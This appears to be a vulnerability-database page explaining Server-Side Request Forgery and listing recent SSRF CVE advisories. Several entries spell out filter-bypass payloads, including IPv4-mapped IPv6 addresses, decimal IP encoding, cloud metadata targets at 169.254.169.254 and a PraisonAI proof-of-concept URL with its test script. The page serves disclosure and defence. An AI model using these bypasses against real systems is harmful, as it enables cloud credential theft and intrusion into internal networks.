Skip to main content

Server-Side Request Forgery

web HIGH

Server-Side Request Forgery exploits applications that fetch remote resources based on user-supplied URLs.

How It Works

Server-Side Request Forgery exploits applications that fetch remote resources based on user-supplied URLs. When a web server accepts a URL parameter to retrieve external content—for example, to proxy images, validate webhooks, or import data—an attacker can manipulate that parameter to make the server send requests to unintended destinations. The critical issue is that these requests originate from the server itself, bypassing firewalls and network controls that would block direct external access.

Attacks come in several forms. Direct SSRF gives the attacker full control over the destination URL, allowing them to target internal services like http://localhost:8080/admin or cloud metadata endpoints at http://169.254.169.254/latest/meta-data/. Blind SSRF occurs when the application makes the request but doesn't return the response to the attacker—they must rely on timing differences or out-of-band techniques to confirm success. Partial SSRF restricts the attacker to modifying only part of the URL, such as the hostname or path, requiring more creative exploitation.

The typical attack flow starts with identifying URL parameters that trigger server-side requests. The attacker then probes for internal services by injecting internal IP addresses or localhost references. Common targets include administrative interfaces, internal REST APIs, Redis or Memcached instances, and especially cloud metadata services that expose IAM credentials. Attackers often employ bypass techniques like encoding IPs in decimal format (2130706433 for 127.0.0.1), exploiting URL parser discrepancies between validation and execution layers, or chaining with open redirects to evade basic filters.

Impact

  • Access to internal services that should be network-isolated—admin panels, monitoring dashboards, configuration endpoints
  • Cloud credential theft via metadata APIs, particularly AWS IAM role credentials exposed at 169.254.169.254
  • Reading local files through file:// protocol support, exposing configuration files and source code
  • Network reconnaissance to map internal infrastructure and identify additional attack targets
  • Remote code execution on back-end systems like Redis or Elasticsearch that accept commands over HTTP
  • Pivoting deeper into internal networks by using the compromised server as a proxy for further attacks

Real-World Examples

Capital One suffered a massive breach in 2019 when an attacker exploited SSRF in a web application firewall to query AWS metadata services, stealing credentials that granted access to over 100 million customer records. The vulnerability allowed requests to the internal metadata endpoint that should have been unreachable.

Shopify's infrastructure exposed internal Google Cloud metadata in 2020 through an image proxy feature. Security researchers demonstrated they could retrieve service account credentials by tricking the proxy into fetching from the metadata API, potentially compromising the entire GCP environment.

Numerous CVEs in enterprise products highlight SSRF in common features: webhook validators in GitLab, PDF generators that fetch remote images, and document conversion services. These typically manifest when URL validation assumes all requests will target external internet resources, failing to anticipate internal network abuse.

Mitigation

  • Allowlist approved destination domains rather than trying to blocklist dangerous ones—only permit necessary external services
  • Disable unnecessary URL schemes entirely (file://, gopher://, dict://)—restrict to https:// only where possible
  • Network segmentation to prevent application servers from reaching internal infrastructure—use separate VLANs or VPCs
  • Deploy cloud metadata protections like AWS IMDSv2 requiring session tokens, making metadata unavailable to simple HTTP requests
  • Validate and parse URLs consistently using a single library, then verify resolved IP addresses aren't private ranges
  • Remove response bodies from errors to prevent information disclosure in blind SSRF scenarios

Recent CVEs (2860)

EPSS 0% CVSS 9.1
CRITICAL Act Now

Server-Side Request Forgery in Linkwarden's fetchTitleAndHeaders function enables authenticated users to perform arbitrary HTTP requests against internal services and infrastructure. The vulnerability stems from inadequate URL validation that only verifies protocol prefixes (http:// or https://) without blocking internal address spaces, allowing attackers to scan internal networks, access metadata endpoints (e.g., cloud provider instance metadata), and potentially exfiltrate sensitive data from services not exposed to the internet. Exploitation requires only low-privilege authentication (PR:L) and can impact resources beyond the vulnerable application's security scope (S:C). Patched in version 2.13.0.

SSRF Linkwarden
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4-v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7.

SSRF Postiz App
NVD GitHub
EPSS 0% CVSS 2.3
LOW Monitor

Server-side request forgery (SSRF) in FastGPT prior to version 4.14.17 allows authenticated users with App editing privileges to bypass SSRF protections in the lafModule workflow node's fetchData function, enabling arbitrary HTTP requests to internal and private network addresses via unvalidated user-controlled URLs passed to axios without filtering against the application's isInternalAddress blocklist.

SSRF Fastgpt
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM This Month

FastGPT is an AI Agent building platform. Prior to version 4.14.17, FastGPT had an inconsistent SSRF protection gap in MCP tool URL handling. The direct MCP preview/run endpoints already rejected internal/private network URLs, but the MCP tool create/update endpoints could still save an internal MCP server URL. That stored URL could later be used by workflow execution without revalidating the destination. An authenticated user with permission to create or manage MCP toolsets could store an internal endpoint such as http://localhost:3000/mcp and later cause the FastGPT backend workflow runner to connect to that internal destination. This issue has been patched in version 4.14.17.

SSRF Fastgpt
NVD GitHub
EPSS 0% CVSS 7.7
HIGH This Week

FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches.

SSRF Fastgpt
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery (SSRF) in Lemmy prior to version 0.19.18 allows authenticated low-privileged users to trigger arbitrary HTTP requests to internal services by creating link posts with URLs targeting loopback, private, or link-local addresses. When a post is created in a public community, the backend asynchronously sends a Webmention to the attacker-controlled URL without validating against internal address ranges, enabling reconnaissance or exploitation of internal services. No public exploit code has been identified at time of analysis, but the vulnerability is straightforward to demonstrate and requires only user-level account access.

SSRF Lemmy
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server-side request forgery (SSRF) in Lemmy prior to version 0.19.18 allows authenticated low-privileged users to bypass internal IP range restrictions and access internal image endpoints. An attacker can submit a crafted post whose Open Graph image tag points to an internal server; Lemmy will fetch and cache the image server-side, potentially exposing sensitive internal resources. The vulnerability exists because the initial page URL is validated against internal IP ranges, but the extracted og:image URL is not subject to the same restriction, creating a two-stage bypass.

SSRF Lemmy
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Bugsink versions 2.1.2 and earlier contain a webhook URL validation bypass (SSRF) where malformed URLs with backslashes and @ symbols pass validation checks but are interpreted differently by Python's urllib parser versus the requests HTTP client, allowing attackers with webhook configuration access to direct outbound POST requests to blocked hosts including loopback and private addresses. The vulnerability is narrower than full SSRF because requests do not follow redirects, the request shape is constrained by URL normalization, and this only affects webhook integrations, not arbitrary outbound proxying.

Python SSRF
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery in MCP Registry's HTTP namespace verification endpoint allows unauthenticated attackers to reach internal IPv4 addresses via specially-crafted IPv6 addresses that encode or tunnel to RFC1918 and cloud-metadata services. The vulnerability exists in the private-address blocklist used by `safeDialContext`, which fails to block IPv6 6to4 (2002::/16), NAT64 well-known (64:ff9b::/96), NAT64 local-use (64:ff9b:1::/48), and deprecated site-local (fec0::/10) prefixes. On dual-stack and IPv6-only cloud deployments (GKE IPv6, AWS IPv6-only EC2, Azure NAT64), this enables direct connections to metadata services and internal Kubernetes API servers. No public exploit code identified at time of analysis, but proof-of-concept has been demonstrated against the production registry.

Kubernetes SSRF Microsoft +2
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW PATCH Monitor

MCP Registry's GitHub OIDC token exchange allows cross-registry replay attacks due to use of a shared global audience string instead of registry-specific identifiers. An attacker controlling or observing any registry deployment can capture a legitimately issued OIDC token and replay it to another registry instance sharing the same codebase to obtain publish-capable JWTs for the victim GitHub owner namespace, breaking deployment isolation. The vulnerability affects all versions prior to 1.7.6; vendor-released patch available.

Authentication Bypass SSRF Microsoft
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Server-side request forgery in n8n-mcp versions 2.18.7 through 2.50.1 allows authenticated attackers with MCP session access to bypass SSRF protections and send HTTP requests to cloud metadata endpoints and internal services, with response bodies returned directly to the attacker. Multi-tenant HTTP deployments are critically exposed: any tenant sharing an AUTH_TOKEN can exfiltrate AWS IAM, GCP service account, or Azure managed identity credentials from the operator's cloud metadata service (169.254.169.254 and related endpoints). Single-tenant and stdio deployments remain vulnerable via indirect prompt injection attacks that manipulate LLM tool calls. Vendor-released patch: n8n-mcp version 2.50.2. No CVSS score assigned; no public exploit code identified at time of analysis, though the advisory contains sufficient technical detail for proof-of-concept development.

SSRF Microsoft Google
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Authenticated administrators in Flarum can read arbitrary files and trigger server-side request forgery via LESS injection in theme color settings. The vulnerability exploits an incomplete patch for CVE-2023-27577 that restricted @import and data-uri() only in the custom_less setting but failed to apply the same restrictions to other LESS config variables such as theme_primary_color and theme_secondary_color. An attacker with admin credentials can inject arbitrary @import directives into compiled forum.css, exposing sensitive files or making outbound HTTP requests to internal networks and cloud metadata endpoints. Vendor-released patches: Flarum 1.8.16 and 2.0.0-rc.1.

SSRF PHP Path Traversal
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8, a Server-Side Request Forgery (SSRF) vulnerability exists in @angular/platform-server due to improper handling of URLs during Server-Side Rendering (SSR). When an attacker sends a request such as GET /\evil.com/ HTTP/1.1 the server engine (Express, etc.) passes the URL string to Angular’s rendering functions. Because the URL parser normalizes the backslash to a forward slash for HTTP/HTTPS schemes, the internal state of the application is hijacked to believe the current origin is evil.com. This misinterpretation tricks the application into treating the attacker’s domain as the local origin. Consequently, any relative HttpClient requests or PlatformLocation.hostname references are redirected to the attacker controlled server, potentially exposing internal APIs or metadata services. This issue has been patched in versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8.

SSRF Angular
NVD GitHub HeroDevs VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Improper SMB connection reuse in curl allows attackers to cause the library to send confidential request data over an attacker-controlled or unintended SMB connection, breaking the expected isolation between connections. The flaw affects a wide range of curl versions used in countless Linux distributions and embedded products, with a CVSS of 7.5 (confidentiality impact only). No public exploit identified at time of analysis, though SSVC marks exploitation as POC and EPSS remains very low (0.02%, 5th percentile).

SSRF Curl
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in PromptHub 0.4.9 through 0.5.3 allows authenticated users to bypass IPv6 address validation and probe internal network resources. The /api/skills/fetch-remote endpoint accepts user-supplied URLs and fetches them server-side, reflecting up to 5 MB of response data. Flawed IPv6 validation allows attackers to reach RFC1918 private networks, loopback addresses, and link-local destinations using IPv4-mapped IPv6 hex representations and alternate ::1 notations. When ALLOW_REGISTRATION=true (a documented configuration), any internet user can register and exploit this vulnerability. Vendor-released patch: version 0.5.4. EPSS data not available; no evidence of active exploitation (not in CISA KEV).

Canonical SSRF
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Server-Side Request Forgery in utcp-http allows remote attackers to access internal cloud metadata endpoints and firewalled services by hosting a malicious OpenAPI specification on a legitimate HTTPS endpoint that declares internal server URLs, which are then blindly trusted during tool invocation without revalidation. The vulnerability affects utcp-http versions 1.1.1 and earlier, where `call_tool()` and `call_tool_streaming()` reuse previously resolved URLs from OpenAPI specs without re-checking security constraints, combined with a string-prefix bypass (`localhost.evil.com` bypassing `startswith` checks). This is a blind SSRF that exposes cloud metadata (AWS/GCP credentials from 169.254.169.254), internal services like Elasticsearch and Redis, and enables exfiltration via LLM responses when combined with prompt injection. No public exploit code or active exploitation is currently identified, but the vulnerability requires only network-level access and user interaction (convincing an LLM agent to register a malicious tool).

Redis SSRF Elastic +1
NVD GitHub VulDB
EPSS 0% CVSS 7.9
HIGH This Week

Server-side request forgery in GitHub Enterprise Server's notebook viewer enables remote unauthenticated attackers to access internal services and systems through URL parser confusion. The vulnerability exploits discrepancies between validation and request execution parsers, allowing crafted URLs to bypass hostname checks and target unintended internal hosts. All versions prior to 3.21 are affected, with patches available across supported release branches (3.16.18, 3.17.15, 3.18.9, 3.19.6, 3.20.2). CVSS 7.9 reflects high impact to subsequent system confidentiality, integrity, and availability. No active exploitation confirmed (not in CISA KEV); reported through GitHub Bug Bounty program.

SSRF Enterprise Server
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH NO ACTION HOSTED Monitor

Server-side request forgery in Azure Monitor Action Group Notification System allows authenticated attackers with low privileges to access internal Azure resources and escalate privileges over the network. Microsoft has released a patch addressing this SSRF vulnerability. The attack requires low complexity and no user interaction, enabling authenticated users to abuse the notification service to make unauthorized requests to internal services, potentially accessing high-value confidential data or performing privileged operations within the Azure environment.

SSRF Microsoft
NVD VulDB
EPSS 0% CVSS 3.7
LOW PATCH Monitor

Server-Side Request Forgery (SSRF) in nuxt-og-image 6.2.5 through 6.4.8 allows remote attackers to bypass the incomplete IPv6 denylist and redirect validation, reaching internal IP addresses and services through incomplete IPv6 prefix filtering and unauthenticated HTTP redirect following. The vulnerability affects the OG image rendering component used by Nuxt applications, enabling attackers to leak internal service responses by injecting crafted IPv6-mapped addresses or chaining external redirects to internal targets.

Kubernetes Redis SSRF +2
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in FreeScout allows authenticated users to access internal network resources and cloud metadata services via HTTP redirect bypass. The vulnerability in Helper::sanitizeRemoteUrl() re-validates the original URL instead of the final redirect destination, enabling attackers to bypass allowlist controls and reach RFC1918 private networks, cloud metadata APIs (169.254.169.254), and internal HTTP services. FreeScout versions prior to 1.8.217 are affected. Vendor-released patch version 1.8.217 is available. No public exploit code or CISA KEV listing identified at time of analysis, but SSRF vulnerabilities are frequently exploited in cloud environments for credential theft and lateral movement.

SSRF PHP
NVD GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

Server-side request forgery in router-for-me CLIProxyAPI 6.9.29 allows authenticated remote attackers to manipulate the url parameter in the API Interface handler to perform arbitrary network requests on behalf of the server. The vulnerability has a publicly available exploit and vendor communication attempts were unsuccessful, though the low CVSS score (2.1) and requirement for authenticated access limit real-world impact compared to unauthenticated SSRF vulnerabilities.

SSRF Cliproxyapi
NVD VulDB GitHub
EPSS 0% CVSS 7.7
HIGH This Week

DNS rebinding bypass in Wallos subscription tracker allows authenticated users to exfiltrate internal network data via SSRF on 10 of 11 HTTP endpoints. Wallos 4.8.4 and prior validate webhook URLs with gethostbyname() but fail to pin DNS resolution in cURL requests, creating a time-of-check-time-of-use race window. Attackers with low-privilege accounts can exploit this to probe internal services (databases, cloud metadata endpoints, admin panels) despite SSRF defenses. EPSS not yet available for this recent CVE. No vendor-released patch at time of analysis - upstream commit e87387f0 exists but tagged release version not confirmed.

SSRF Wallos
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Blind SSRF via CGNAT address bypass in Wallos prior to version 4.8.1 allows authenticated users to probe internal services on Carrier-Grade NAT networks (100.64.0.0/10) through logo/icon URL fetching in subscription and payment endpoints. The vulnerability stems from incomplete IP range validation that fails to block RFC 6598 CGNAT addresses, enabling reconnaissance of services in Tailscale, dual-stack carrier environments, and internal infrastructure. CVSS 4.3 reflects limited confidentiality impact with authentication requirement; actively fixed in 4.8.1.

SSRF PHP
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

Istio versions prior to 1.28.6 and 1.29.2 allow authenticated attackers to perform Server-Side Request Forgery (SSRF) attacks via RequestAuthentication resources with malicious jwksUri values pointing to internal services, enabling istiod to fetch sensitive data from localhost or link-local IPs and distribute it to Envoy proxies through xDS configuration. The vulnerability requires an authenticated user to create or modify a RequestAuthentication resource, limiting the attack surface to cluster administrators or users with API access. A partial mitigation was released in earlier versions (1.29.1, 1.28.5, 1.27.8) but was incomplete; the complete fix is in versions 1.28.6 and 1.29.2.

SSRF Information Disclosure Red Hat
NVD GitHub
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Server-Side Request Forgery in docling-graph versions up to 1.5.0 allows authenticated attackers with user interaction to bypass IP validation and reach private, loopback, and cloud metadata endpoints by supplying arbitrary URLs to the URLInputHandler class or via the --source CLI argument. The vulnerability combines missing internal IP address validation with unrestricted HTTP redirects (allow_redirects=True), enabling theft of cloud IAM credentials and access to internal services on 127.0.0.1, 10.x, 172.16.x, 192.168.x, and 169.254.169.254 address ranges. Vendor-released patch: v1.5.1.

SSRF Open Redirect
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Unauthenticated server-side request forgery (SSRF) in Gotenberg 8.30.1 and earlier allows remote attackers to force the server to make HTTP requests to internal/loopback addresses by bypassing default deny-lists with IPv4-mapped IPv6 notation (e.g., http://[::ffff:127.0.0.1]:port). The vulnerability affects both the downloadFrom file-fetching feature and the webhook delivery feature. Attackers can read content from internal HTTP endpoints and trigger state-changing requests against services bound to localhost, exposing internal APIs, cloud metadata endpoints, and admin interfaces. Fix available in version 8.32.0. No public exploit code confirmed outside the GitHub advisory PoC, not listed in CISA KEV, but CVSS 9.4 Critical rating reflects the network-accessible, unauthenticated nature and high confidentiality/integrity impact.

SSRF Microsoft Python +2
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Server-Side Request Forgery in Gotenberg's LibreOffice conversion endpoint allows remote attackers to make arbitrary HTTP requests from the server to internal networks and cloud metadata endpoints. Attackers upload specially crafted Office documents (DOCX, XLSX, PPTX) with embedded external URL references that LibreOffice fetches during PDF conversion, completely bypassing the SSRF protections introduced in v8.31.0. Publicly available exploit code exists with detailed proof-of-concept showing three successful HTTP requests to attacker-controlled servers. The vulnerability enables exfiltration of cloud IAM credentials from metadata services (169.254.169.254), internal service enumeration, and network reconnaissance without authentication. CVSS 8.2 with network vector and no privileges required reflects accurate real-world risk given documented exploitation method and lack of vendor-released patch.

SSRF Microsoft Docker +2
NVD GitHub
EPSS 0% CVSS 6.6
MEDIUM PATCH This Month

Server-side request forgery in Playwright Capture before version 1.39.6 allows remote attackers to access local files and internal network resources through browser-side redirection mechanisms when processing untrusted URLs. An attacker-controlled page can abuse window.location.href and similar navigation primitives to redirect the capture process to file:// URLs or private IP addresses, potentially leaking responses through screenshots, saved content, or logs. The vulnerability is mitigated by request routing checks introduced in version 1.39.6 that block secondary requests to local files, non-global IP addresses, and .local domains.

SSRF
NVD GitHub VulDB
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

An unsafe remote resource fetching vulnerability existed in MISP Modules expansion modules. The html_to_markdown module accepted arbitrary HTTP(S) URLs without sufficient validation, which could allow Server-Side Request Forgery against loopback, private, or link-local network resources. Additionally, the qrcode module disabled TLS certificate verification when retrieving remote images, exposing requests to potential man-in-the-middle interception or response tampering. The issue was fixed by validating URL schemes, blocking local and private address ranges, resolving hostnames before fetching, enforcing request timeouts, and re-enabling TLS certificate verification. As reported by Bilal Teke.

SSRF
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

### Summary The URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. ### Details The current PraisonAI project uses _validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks. <img width="1290" height="1145" alt="QQ20260424-151256-24-1" src="https://github.com/user-attachments/assets/d5f16b74-5ad2-444f-8600-b05f78a4b769" /> However, there are indeed differences in parsing between urlparse and the library that actually sends the request. Currently, almost all application scenarios in this project involve first using _validate_url for URL validation, and then using _get_session().get to send the request. <img width="1143" height="740" alt="QQ20260424-151437-24-2" src="https://github.com/user-attachments/assets/b1bf6ec2-d32a-4dac-b814-da819e8d3c83" /> In reality, its underlying mechanism is requests.get. <img width="1042" height="576" alt="QQ20260424-151645-24-3" src="https://github.com/user-attachments/assets/e17352c3-4205-44d6-ab6e-75566480215b" /> The core issue: `urlparse()` and `requests` disagree on which host a URL like `http://127.0.0.1:6666\@1.1.1.1` points to: - `urlparse()` treats `\` as a regular character and `@` as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public) - `requests` treats `\` as a path character, connecting to `127.0.0.1` (internal) Below is a test code I wrote following the code. ``` import sys from pathlib import Path from pprint import pprint sys.path.insert(0, str(Path(r"D:/BaiduNetdiskDownload/PraisonAI-main/PraisonAI-main/src/praisonai-agents"))) from praisonaiagents.tools import spider_tools # url = "http://127.0.0.1:6666\@1.1.1.1" url = "http://127.0.0.1:6666" result = spider_tools.scrape_page(url) if isinstance(result, dict) and "error" in result: print("scrape failed:", result["error"]) else: pprint(result) ``` When an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it. <img width="1068" height="128" alt="QQ20260424-152007-24-4" src="https://github.com/user-attachments/assets/294bff10-2af6-4960-bf69-dbf3340b1e9b" /> However, when an attacker uses `http://127.0.0.1:6666\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack. <img width="2089" height="324" alt="QQ20260424-152123-24-5" src="https://github.com/user-attachments/assets/4421ce42-e47b-48de-a97a-56ce56a2bbc9" /> ### PoC ``` http://127.0.0.1:6666\@1.1.1.1 ``` ### Impact SSRF

SSRF
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Server-side request forgery in OpenClaw before 2026.4.20 allows unauthenticated remote attackers to relay unintended requests through QQBot direct media upload endpoints (uploadC2CMedia and uploadGroupMedia) by sending crafted image URLs that bypass SSRF protections. The vulnerability affects QQBot outbound media handling and does not expose arbitrary local files, but could allow attackers to make configured QQBot media delivery requests to unintended destinations.

SSRF Openclaw
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Server-side request forgery in OpenClaw before version 2026.4.22 allows remote attackers to bypass SSRF protection in the Zalo plugin's sendPhoto function by providing malicious photo URLs, enabling unauthorized access to internal resources. The vulnerability affects the Zalo Bot API integration and requires network access but involves time-based attack complexity; no public exploit code or active exploitation has been confirmed.

Authentication Bypass SSRF Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Server-side request forgery in OpenClaw browser navigation policy before version 2026.4.10 allows authenticated attackers to bypass hostname validation through DNS rebinding attacks, enabling pivots to internal network resources via unallowlisted hostnames. The vulnerability exploits inconsistent hostname resolution between validation checks and actual network requests made by the Chromium engine, with fix confirmed in upstream commit 121c452d and released in version 2026.4.10.

SSRF Openclaw
NVD GitHub
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

OpenClaw before version 2026.4.10 allows authenticated attackers to bypass Server-Side Request Forgery (SSRF) policy enforcement through incomplete navigation guard coverage in browser press and type interactions. Attackers can trigger unauthorized navigation actions, including pressKey and type-submit flows, that skip post-action security checks, potentially enabling SSRF attacks against restricted endpoints.

Authentication Bypass SSRF Openclaw
NVD GitHub
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Server-side request forgery via unvalidated WebSocket URL in OpenClaw before 2026.4.5 allows authenticated attackers to pivot connections to arbitrary hosts through the Chrome DevTools Protocol (CDP) /json/version endpoint. The webSocketDebuggerUrl response field lacks validation, enabling second-hop SSRF attacks where an attacker can redirect browser profile connections to untrusted targets on internal or external networks. No public exploit code identified at time of analysis, but the vulnerability is straightforward to trigger once authenticated to the CDP endpoint.

SSRF Open Redirect
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

The dssrf Node.js library (versions < 1.3.0) allows Server-Side Request Forgery (SSRF) protection bypass through IPv6 addresses targeting internal resources. Attackers can craft HTTP requests using IPv6 loopback (::1), unique local addresses (fc00::/7), link-local addresses (fe80::/10), IPv4-mapped IPv6 addresses (::ffff:127.0.0.1, ::ffff:169.254.169.254), NAT64 prefixes, and other IPv6 categories to access internal services, cloud metadata endpoints (IMDS), and private networks that the library was explicitly designed to block. The vulnerability directly contradicts dssrf documentation claiming IPv6 is disabled entirely, and a publicly available exploit code (POC) demonstrates all affected IPv6 categories. Patch available in version 1.3.0.

SSRF Node.js
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Server-Side Request Forgery in new-api allows authenticated regular users to probe internal services and exfiltrate localhost content by injecting 0.0.0.0 into multimodal API requests. The SSRF protection filter fails to block the 0.0.0.0/8 address range, which resolves to localhost on Linux. Attackers holding any valid API token can send crafted image_url, file_data, or video_url parameters to /v1/chat/completions, /v1/responses, or /v1/messages endpoints, bypassing private-IP checks entirely. When requests route through AWS/Bedrock Claude adaptors, the server fetches the content and inlines it into model responses, upgrading blind SSRF to full-read exfiltration of internal images, PDFs, and text files on default-allowed ports 80, 443, 8080, and 8443. No public exploit code identified at time of analysis; no vendor-released patch confirmed for versions through 0.11.9-alpha.1.

SSRF
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Origin confusion in Tauri's is_local_url() function on Windows and Android allows remote attackers to invoke local-only IPC commands by hosting content on a domain whose first subdomain matches the application's custom URI scheme. An attacker can register a domain like http://app.evil.com/ to bypass origin validation when the target application uses an app:// custom protocol, gaining unauthorized access to backend functionality intended only for the application's own frontend. A public proof-of-concept demonstrates successful command invocation through this bypass.

Google SSRF Microsoft
NVD GitHub
EPSS 0% CVSS 7.2
HIGH This Week

Server-Side Request Forgery (SSRF) in Cisco Unity Connection Web Inbox allows remote unauthenticated attackers to send arbitrary network requests sourced from the vulnerable server. The vulnerability affects the web UI component and requires no authentication, privileges, or user interaction (CVSS AV:N/AC:L/PR:N/UI:N), enabling attackers to abuse the server's network position for internal network reconnaissance, service enumeration, or attacks against backend systems. The changed scope (S:C) indicates impact extends beyond the vulnerable component to other network resources accessible from the Unity Connection server.

SSRF Cisco Cisco Unity Connection
NVD
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in AVideo versions up to 29.0 allows authenticated attackers to exfiltrate cloud metadata credentials and access internal services via HTTP redirect bypass and DNS rebinding attacks. Two endpoints in AVideo's AI plugin and EPG parser validate user-supplied URLs using isSSRFSafeURL() but then fetch them with file_get_contents() using PHP's default automatic redirect following. An attacker supplies a URL to a controlled server returning a 302 redirect to internal resources (e.g., AWS instance metadata at 169.254.169.254), bypassing SSRF protections since only the initial URL is validated. Vendor-released patch available via GitHub commit 603e7bf7. CVSS 7.7 reflects Changed Scope due to cross-boundary access to cloud infrastructure credentials.

Python SSRF PHP
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Blind server-side request forgery (SSRF) in AVideo's donation webhook system allows authenticated users to configure webhook URLs pointing to internal/loopback/metadata services (127.0.0.1, 169.254.169.254, RFC1918 addresses). When any user donates via the CustomizeUser plugin, the AVideo server issues an unauthenticated POST request to the attacker-supplied URL without validating it against the codebase's existing isSSRFSafeURL() helper. The vulnerability is compounded by CURLOPT_FOLLOWLOCATION being enabled without per-hop revalidation, permitting HTTP 307 redirects from attacker-controlled hosts to bypass even future URL validation. CVSS 5.4 (network-accessible, requires authentication, low complexity); no public proof-of-concept or active KEV exploitation confirmed at analysis time, but the vulnerability is trivially exploitable with two attacker-controlled accounts and the PoC is fully documented in the advisory.

Redis SSRF CSRF +1
NVD GitHub
EPSS 1% CVSS 9.2
CRITICAL POC PATCH Act Now

Unauthenticated SSRF in MagicMirror ≤2.35.0 allows remote attackers to proxy arbitrary HTTP requests through the server, accessing cloud metadata services (AWS/GCP/Azure IMDSv1), internal network resources, and localhost services via the unrestricted `/cors` endpoint. The vulnerability is compounded by environment variable expansion: attackers can exfiltrate server-side secrets (API keys, database credentials) by embedding placeholders like `**SECRET_API_KEY**` in URLs, which the server resolves from `process.env` before making the request. Vendor-released patch version 2.36.0 disables the CORS proxy by default and implements IP blocklisting when enabled. Publicly available exploit code exists (PoC provided in GitHub advisory GHSA-ph6f-2cvq-79hq). No active exploitation confirmed at time of analysis.

SSRF Microsoft
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in open-webSearch's fetchWebContent MCP tool enables remote unauthenticated attackers to fetch arbitrary private-network URLs and receive full response bodies. Two defects in the `isPrivateOrLocalHostname` validator combine to allow bypass: bracketed IPv6 literals (e.g., `[::ffff:7f00:1]`) are never validated because Node's URL.hostname preserves brackets and Node's isIP() returns 0 for bracketed strings, and DNS resolution is never performed so attacker-controlled hostnames resolving to RFC1918 addresses pass unchecked. When deployed with HTTP transport enabled (documented configuration, active in Docker image), the MCP server binds to 0.0.0.0:3000 with CORS origin='*' and no authentication, exposing the vulnerable tool to any network attacker. Fixed in version 2.1.7. No public exploit identified at time of analysis, but vendor-supplied proof-of-concept demonstrates full exploit chain against AWS EC2 metadata and localhost services.

Microsoft SSRF Node.js +3
NVD GitHub
EPSS 0% CVSS 8.2
HIGH This Week

Complete SSRF protection bypass in ssrfcheck allows remote attackers to reach all private IPv4 ranges including cloud metadata endpoints (169.254.169.254) by encoding targets as IPv4-mapped IPv6 addresses (e.g., http://[::ffff:127.0.0.1]/). Node.js WHATWG URL parser normalizes these addresses to compressed hex form before the library's dot-notation-only regex executes, rendering all private IP checks ineffective. EPSS score unavailable for this recent CVE (2026), but the attack requires no authentication (PR:N), has low complexity (AC:L), and affects the latest version (1.3.0) with no vendor-released patch identified at time of analysis. Publicly available exploit code exists with complete proof-of-concept and automated verification scripts confirmed on Node.js v20.20.2.

SSRF Microsoft Node.js
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

